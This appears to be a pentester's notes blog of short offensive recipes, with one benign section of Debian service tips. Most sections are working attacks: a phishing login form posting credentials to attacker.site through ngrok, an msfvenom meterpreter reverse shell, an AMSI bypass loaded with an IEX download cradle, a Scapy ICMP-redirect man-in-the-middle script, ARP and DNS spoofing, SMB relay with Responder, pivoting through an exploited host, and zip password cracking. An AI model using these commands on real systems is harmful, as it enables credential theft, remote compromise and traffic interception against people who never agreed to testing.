Categorieën
wmic

Find unquoted service paths (Win)

wmic service get name,displayname,pathname,startmode | findstr /I “auto” | findstr /I /v “c:\windows\” | findstr /i /v “””

Categorieën
netcat Uncategorized

Harvest credentials

Start nectat listener

ncat -lvp 4444

Start ngrok to make url accessible

./ngrok http 4444

Send page to users:

<b>Login required</b><br><br><b>ENTER Credentials:<br><br><form action=”http://attacker.site&#8221; method=”GET”><input type=”text” name=”email” placeholder=”Your Username”><br><input type=”password” name=”password”><br><input type=”submit” value=”Submit”></form>

login prompt

Categorieën
AV Evasion Pentest

AV Evasion Bypass ASMI

1. create MSFVENOM

msfvenom -p windows/x64/meterpreter/reverse_https -f psh LHOST=10.10.20.142 LPORT=443 > ‘/home/kali/http/https2.ps1’

2. copy raw from https://github.com/aloksaurabh/OffenPowerSh/tree/master/Bypass

curl https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1 > demo.ps1

3. python2 -m SimpleHTTPServer 80

4. IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.20.142/demo.ps1&#8217;);Invoke-AlokS-AvBypass

5. IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.20.142/https2.ps1&#8217;)

Categorieën
ICMP-Redirect Attack

ICMP-Redirect Attack

Enable IP forwarding and Source NAT translation for Victim subnet

#sudo echo 1 > /proc/sys/net/ipv4/ip_forward
#sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
#sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT (only for traffic forward)
#sudo iptables -t nat -L
  • ip – gateway = 10.100.31.1
  • ip – victim = 10.100.13.126
  • ip – attacker = 10.100.13.20
  • ip- victime website = 10.23.56.100

Scapy create ICMP-Redirect packet (type=5) for a better gateway to destination 10.23.56.100

>>> ip=IP()
>>> ip.src='10.100.13.1'
>>> ip.dst='10.100.13.126'
>>> ip.display
bound method IP.display of IP  src=10.100.13.1 dst=10.100.13.126 |>>
>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='10.100.13.20'
>>> icmp.display
bound method ICMP.display of >
>>> ip2=IP()
>>> ip2.src='10.100.13.126'
>>> ip2.dst='10.23.56.100'
>>> ip2.display
bound method IP.display of IP  src=10.100.13.126 dst=10.23.56.100 |>>


# Creating and sending ICMP redirect packets

originalRouterIP='10.100.13.1'
attackerIP='10.100.13.20'
victimIP='10.100.13.126'
serverIP='10.23.56.100'

# We create an ICMP Redirect packet

ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ contain the original TCP SYN packet
# sent from the victim Ip

redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP

fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

while True:send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
# Press <enter>
Categorieën
Uncategorized

Port Forwarding

Listen local port 9999 to forward traffic to target rdp using SSH tunnel of exploited host

ssh -L 9999:10.10.20.140:3389 msx@192.168.68.117

Use Proxychain to route traffic through exploited host

ssh -D 127.0.0.1:1090 msx@192.168.68.117

Usage example nmap scan

proxychains nmap -sT -v 10.10.20.140
Categorieën
Proxychains

Proxychains

proxychains nmap -sT -PN -n -sV -p 80,443,21,22 10.10.20.129

proxychains nmap -sTV -n -PN -p 21 10.10.51.21
Categorieën
Debian Uncategorized

Debian Tips

How to list all services in Debian

If you want to view the entire services running in the Debian 10, you can run the following command.

ls /etc/init.d

If you want to get a more detailed list of all services and processes running in your Debian operating system, execute the following command.

Systemctl list-unit-files

How to check the status of a particular service using init.d

There are several ways to check the status of a particular service whether it is running or not. One of such methods is by using init.d. You can execute the command with root privileges having following syntax,

/etc/init.d/{servicename} status

Let’s check the status of the networking service. The complete command should look like the following,

/etc/init.d/networking status

How to stop, start and restart a particular service

There are two methods of stopping and starting a particular service. I will list here both of the methods.

Start and stop a service using init.d

Let me start by stopping the already running networking service to show you how to stop any service with the help of init.d. Execute the following command with root privileges,

/etc/init.d/networking stop

Print route

route -n
Categorieën
Responder Uncategorized

Responder & SMB Relay

1. Run RunFinger.py -i<target IP> against target

2. Modify the Responder.confconfiguration file and disable the “SMB” server and “HTTP” server options by setting the values to “Off”.

3.python Responder.py -I eth0 –lm

4. python MultiRelay.py -t <target IP> –u ALL

 

SMB Relay:

use windows/smb/smb_relay

set target SMBHOST
set SRVHOST

Configure DNS spoof record
echo “172.16.5.150 *.sportsfoo.com” > dns

Run DNS spoof

dnsspoof -i tap0 -f dns

Run Arp Mitm

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i tap0 -t 172.16.5.30 172.16.5.1
arpspoof -i tap0 -t 172.16.5.1 172.16.5.3

Categorieën
Uncategorized ZIP crack

ZIP crack

fcrackzip -D -p /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt XXX.zip

Categorieën
Uncategorized Windows Tricks

Windows Tricks